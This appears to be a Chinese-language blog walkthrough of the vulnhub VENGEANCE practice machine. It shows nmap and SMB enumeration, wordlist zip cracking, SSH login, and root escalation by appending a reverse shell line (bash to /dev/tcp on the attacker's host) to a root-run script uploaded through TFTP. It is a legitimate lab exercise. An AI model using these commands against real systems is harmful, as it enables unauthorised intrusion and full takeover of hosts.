vulnhub之VENGEANCE的实践

今天实践的是vulnhub的VENGEANCE镜像，

下载地址，https://download.vulnhub.com/digitalworld/VENGEANCE.7z，

用workstation导入成功，先做端口扫描，

sudo netdiscover -r 192.168.137.0/24，

接着进行端口扫描，sudo nmap -sS -sV -T5 -A -p- 192.168.137.82，

发现了不少服务，尤其是有smb服务，还有个22222端口的ssh服务，

对smb服务进行扫描，sudo enum4linux 192.168.137.82，

发现了sara和qinyi两个用户，

连接smb，sudo smbclient -L 192.168.137.82，

发现了sarapublic$目录，连接sarapublic$目录，

sudo smbclient //192.168.137.82/sarapublic$，

发现了不少文件，下载profile.txt和gio.zip，

gio.zip解压要密码，猜测密码在profile.txt里，

kali攻击机上启动一个http下载服务，

python2 -m SimpleHTTPServer 80，

把profile.txt里的字符串采集成字典，

sudo cewl 192.168.137.168/profile.txt -w dict.txt，

破解，sudo fcrackzip -D -p dict.txt -u gio.zip，

用得到的密码解压gio.zip，查看文件，pass_reminder.txt里有个提示，

查看ted_talk.pptx，获取到了密码giovanni_130R_Suzuka，

ssh登录靶机，ssh qinyi@192.168.137.82 -p 22222，

id看一下，不是root，需要进一步提权，

sudo -l看到/home/sara/private/eaurouge是root权限执行的，

但是没有查看和编辑权限，下载pspy64工具进一步获取进程信息，wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64，

执行pspy64发现/home/sara/private目录是tftp服务管理的，

扫描确认，sudo nmap -sU -p69 192.168.137.82，

登录下载eaurouge文件，tftp 192.168.137.82，get eaurouge，

查看eaurouge文件，发现是个bash脚本，

在里面添加反弹shell脚本，bash -c 'exec bash -i &>/dev/tcp/192.168.137.168/8888 <&1'，

把文件上传回去，put eaurouge，

kali攻击机上开启nc监听，nc -lvp 8888，

靶机上执行，sudo /home/sara/private/eaurouge，

kali攻击机上获取到shell，id看一下，确认是root。